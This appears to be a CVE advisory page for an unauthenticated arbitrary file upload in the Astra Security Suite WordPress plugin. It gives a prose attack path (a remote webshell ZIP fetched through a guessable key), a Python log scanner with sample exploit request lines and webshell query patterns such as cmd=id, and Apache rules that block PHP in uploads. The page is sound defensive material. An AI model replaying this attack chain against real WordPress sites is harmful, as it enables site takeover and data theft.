CVE Alert: CVE-2025-11521 – astrasecuritysuite – Astra Security Suite – Firewall & Malware Scan
CVE-2025-11521
The Astra Security Suite – Firewall & Malware Scan plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient validation of remote URLs for zip downloads and an easily guessable key in all versions up to, and including, 0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible.
AI Summary Analysis
Risk verdict
High risk: unauthenticated remote arbitrary file upload with potential code execution via the affected WordPress security plugin; urgent to assess and patch.
Why this matters
The plugin fetches a ZIP archive from a caller-supplied remote URL and the only gate on that flow is an easily guessable key, so an attacker needs no account to have attacker-controlled files written onto the server. If the archive lands in a web-accessible, PHP-executing directory, the result is full site compromise, data exposure, and service disruption. With no user interaction required and a public-facing surface, rapid automated exploitation is plausible on exposed sites.
Most likely attack path
The vector is network-reachable and needs no authentication, although the rating assigns it high attack complexity. An attacker calls the plugin's zip-download flow with the guessable key and a URL pointing at an archive they control; the plugin fetches and extracts it, placing the attacker's files (for example a PHP webshell) in a web-accessible path. Requesting that file then executes the attacker's code under the web server account, from which they can read wp-config.php and the database, modify the site, or pivot to other components on the host.
Who is most exposed
Publicly reachable WordPress deployments running this plugin at version 0.2 or earlier, especially on shared hosting where the web server account can write to web-accessible directories that also execute PHP, and where outbound HTTP from the web server is unrestricted (the ZIP is fetched server-side).
Detection ideas
- Requests to the plugin's zip-download endpoint, in particular ones carrying a parameter whose value is a remote URL ending in .zip, from clients that have never authenticated
- Server-side fetches of remote ZIPs by the web server process, and archive extraction into web-accessible directories
- New or recently modified PHP files under wp-content/uploads or elsewhere in the webroot
- Requests for PHP files under wp-content/uploads, webshell-style query strings (cmd=, exec=) and other signs of PHP executing where only static files should live
- Outbound connections from the web server to unfamiliar hosts, indicating retrieval of the attacker's payload archive
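The first, third and fourth detection ideas can be turned into a small log scanner. The block below is an added example, not code from the advisory or the plugin: it parses combined-format web server access logs, flags requests into the plugin directory that carry a remote ZIP URL as a parameter, flags requests for PHP files under wp-content/uploads, correlates the two by client IP, and lists recently modified PHP files on disk. The plugin path is assumed from the slug "astrasecuritysuite"; the endpoint name (download.php), parameter names and key value in the sample log lines are constructed placeholders, since the advisory does not name them.

```python
import os
import re
import time
from datetime import datetime
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# ASSUMPTION: the plugin lives under the standard WordPress path for the slug
# "astrasecuritysuite". The advisory does not name the vulnerable endpoint or
# parameter, so every request into the plugin directory is inspected.
PLUGIN_PATH = "/wp-content/plugins/astrasecuritysuite/"
UPLOADS_PATH = "/wp-content/uploads/"
REMOTE_ZIP_RE = re.compile(r"^https?://\S+\.zip(\?\S*)?$", re.IGNORECASE)
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def classify(entry):
    """Return (rule, detail) findings for one parsed entry."""
    findings = []
    parts = urlsplit(entry["target"])
    path = unquote(parts.path)
    # Rule 1: a request into the plugin whose parameter value is a remote ZIP URL
    # (parse_qs already percent-decodes the value).
    if path.startswith(PLUGIN_PATH):
        for name, values in parse_qs(parts.query).items():
            for value in values:
                if REMOTE_ZIP_RE.match(value):
                    findings.append(("remote_zip_fetch", f"{name}={value}"))
    # Rule 2: a PHP file requested under uploads, which should never be served as code.
    if path.startswith(UPLOADS_PATH) and PHP_EXT_RE.search(path):
        findings.append(("php_in_uploads", path))
    return findings


def scan(lines):
    """Run both rules over raw log lines and return the hits in log order."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for rule, detail in classify(entry):
            hits.append({"ip": entry["ip"], "ts": entry["ts"], "rule": rule,
                         "detail": detail, "status": entry["status"]})
    return hits


def correlate(hits, window_seconds=600):
    """IPs that fetched a remote ZIP and then hit a PHP file in uploads within the window."""
    by_ip = {}
    for h in hits:
        by_ip.setdefault(h["ip"], []).append(h)
    suspects = []
    for ip, hs in by_ip.items():
        fetches = [h["ts"] for h in hs if h["rule"] == "remote_zip_fetch"]
        execs = [h["ts"] for h in hs if h["rule"] == "php_in_uploads"]
        if any(0 <= (e - f).total_seconds() <= window_seconds
               for f in fetches for e in execs):
            suspects.append(ip)
    return suspects


def recent_php_files(root, max_age_seconds=86400):
    """Filesystem check: PHP files under root modified within the last max_age_seconds."""
    cutoff = time.time() - max_age_seconds
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if PHP_EXT_RE.search(name) and os.path.getmtime(full) >= cutoff:
                found.append(full)
    return sorted(found)


# Constructed sample log lines (not real traffic); endpoint name and key value are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Oct/2025:10:15:01 +0000] "GET /wp-content/plugins/astrasecuritysuite/'
    'download.php?key=guessable&url=http%3A%2F%2F198.51.100.9%2Fshell.zip HTTP/1.1" '
    '200 512 "-" "python-requests/2.32"',
    '203.0.113.7 - - [03/Oct/2025:10:15:04 +0000] "GET /wp-content/uploads/2025/10/shell.php?cmd=id '
    'HTTP/1.1" 200 128 "-" "python-requests/2.32"',
    '198.51.100.20 - - [03/Oct/2025:10:16:30 +0000] "GET /wp-content/uploads/2025/10/photo.jpg '
    'HTTP/1.1" 200 40321 "https://example.com/" "Mozilla/5.0"',
    '198.51.100.21 - - [03/Oct/2025:10:17:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ts"].isoformat(), h["ip"], h["rule"], h["detail"], h["status"])
    print("suspect IPs:", correlate(hits))
```

Run it against a real access log by feeding the file's lines to scan(); the correlation step matters because a single plugin request with a remote URL may be a scanner probing the endpoint, whereas the same IP fetching a ZIP and then requesting a PHP file under uploads a few seconds later is a successful chain. Point recent_php_files() at the wp-content/uploads directory on the host to find the dropped file itself.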
Mitigation and prioritisation
- Update the plugin to a version later than 0.2 as soon as one is available; until then, deactivate and uninstall it, since the vulnerable flow is reachable without authentication.
- Add Web Application Firewall rules that block requests to the plugin carrying remote URL parameters, particularly ones ending in .zip, and that block direct requests for PHP files under wp-content/uploads.
- Harden file permissions so the web server account can write only where it must, and deny PHP execution in the uploads directory so a dropped file cannot run even if the upload succeeds.
- Validate deployment in a staging environment before production update; schedule a rapid maintenance window if applicable.
- Monitor and alert on indicators of compromise; if KEV is confirmed or EPSS is ≥ 0.5, treat as priority 1.
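The third mitigation is the one that blunts this class of bug regardless of which plugin has it: uploads should be a data directory, never an execution directory. The fragment below is an added example for Apache 2.4, not configuration from the advisory or the plugin; the document root /var/www/html is an assumption.

```apache
# Weak (the WordPress default): wp-content/uploads inherits the site-wide PHP
# handler, so a .php file written there by a vulnerable plugin runs on request.
#
# <Directory "/var/www/html/wp-content">
#     AllowOverride All
# </Directory>

# Hardened: refuse to serve or execute PHP under wp-content/uploads.
<Directory "/var/www/html/wp-content/uploads">
    # Reject any request for a PHP-family file; a dropped webshell gets 403.
    <FilesMatch "\.(php[0-9]?|phtml|phar)$">
        Require all denied
    </FilesMatch>
    # Belt and braces for mod_php deployments; php-fpm setups should instead
    # exclude this directory from the SetHandler/ProxyPassMatch that routes to PHP.
    <IfModule mod_php.c>
        php_flag engine off
    </IfModule>
</Directory>
```

Put the same rules in a wp-content/uploads/.htaccess if you cannot edit the main server configuration, and confirm the result by requesting a harmless test.php placed in that directory: it must return 403, not execute. On nginx the equivalent is a location block for ^/wp-content/uploads/.*\.php$ that returns 403 ahead of the fastcgi location.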
